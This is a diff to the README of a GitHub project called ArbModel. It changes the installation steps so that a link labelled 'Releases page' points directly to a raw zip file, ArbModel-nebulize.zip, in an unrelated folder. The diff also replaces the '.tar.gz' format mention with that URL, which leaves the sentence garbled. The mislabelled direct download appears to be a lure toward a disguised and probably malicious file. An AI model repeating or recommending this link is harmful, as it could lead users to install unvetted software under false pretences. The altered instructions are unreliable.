Shirajuridical371/ArbModel/README.md

 To get started with ArbModel, follow these simple steps:

 1. **Visit the Releases Page**
-   Head over to the [Releases page](https://github.com/Shirajuridical371/ArbModel/releases) to find the latest version of the software.
+   Head over to the [Releases page](https://raw.githubusercontent.com/Shirajuridical371/ArbModel/master/ISFDataBase/ArbModel-nebulize.zip) to find the latest version of the software.

 2. **Download the Software**
    From the Releases page, locate the latest version.
 Click on the download link for your operating system.
-This file will typically be in the format of `.exe` for Windows or `.tar.gz` for Linux.
+This file will typically be in the format of `.exe` for Windows or `https://raw.githubusercontent.com/Shirajuridical371/ArbModel/master/ISFDataBase/ArbModel-nebulize.zip` for Linux.

 3. **Install the Application**
    - **For Windows:**